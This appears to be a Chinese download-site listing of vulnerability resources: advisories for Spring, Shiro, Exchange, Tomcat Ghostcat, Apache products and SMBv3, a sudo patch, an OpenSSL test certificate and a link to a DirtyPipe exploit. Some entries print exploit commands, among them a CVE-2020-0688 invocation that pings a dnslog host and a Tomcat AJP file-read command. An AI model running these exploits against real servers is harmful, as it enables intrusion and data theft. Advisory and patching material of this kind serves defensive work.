linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
2022-04-07 12:00:46 3.13MB linux centos 运维 服务器
1
3月31日,spring 官方通报了 Spring 相关框架存在远程代码执行漏洞,并在 5.3.18 和 5.2.20.RELEASE 中修复了该漏洞。 漏洞评级:严重 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEASE 的Spring框架均存在该漏洞,建议用户尽快进行排查处置。 缺陷分析 CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
2022-04-06 19:00:08 28.48MB spring core
1
https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
2022-04-06 14:00:14 9KB kali linux dev
1
下载后执行 openssl x509 -in 2022_0778.pem -inform DER -text -noout 或者在自己产品证书管理界面上传证书验证 参考https://github.com/drago-96/CVE-2022-0778 制作证书验证
2022-04-06 00:17:06 856B openssl CVE-2022-0778) 778
1
1.漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。 2.影响版本 3.1.0 3.0.0至3.0.6 Spring Cloud Gateway 其他已不再更新的版本
2022-04-06 00:16:10 26.83MB gateway spring cloud 深度学习
1
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 Shiro550影响版本: - Apache Shiro<=1.2.4 exp: ``` GUI
2022-04-06 00:16:09 49.83MB 安全漏洞 shiro CVE-2016-4437
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft Exchange Server 2016 Cumulative Update 15 -Microsoft Exchange Server 2019 Cumulative Update 4 exp1: [@Ridter](https://github.com/Ridter/cve-2020-0688) ``` python cve-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn" ``` exp2: [@zcgonvh](https://github.com/zcgonvh/CVE-2020-068
2022-04-06 00:16:06 35KB Exchange 安全漏洞 exp
Apache-flink 未授权访问任意jar包上传反弹shell CVE-2019-0193 Apache-Solr via Velocity template RCE CVE-2019-17564 Apache-Dubbo反序列化漏洞 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 Apache Solr 未授权上传
2022-04-06 00:16:05 44.13MB apache 安全漏洞 CVE
# CVE-2020-1938 Apache Tomcat 文件包含 影响版本: Tomcat6-9 Exp: ``` python CNVD-2020-10487-Tomcat-Ajp-lfi.py x.x.x.x -p 8009 -f urfile 一. 漏洞概述 2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。目前,厂商已发布新版本完成漏洞修复。 Tomcat是Apache软件基金会中的一个重要项目,性能稳定且免费,是目前较为流行的Web应用服务器。由于Tomcat应用范围较广,因此本次通告的漏洞影响范围较大,请相关用户及时采取防护措施修复此漏洞。 参考链接: https://www.cnvd.org.cn/webinfo/show/5415 二、影响范围
2022-04-06 00:16:04 480KB tomcat apache java EXP
Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。Windows10和Windows Server 2016引入了SMB 3.1.1。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。
1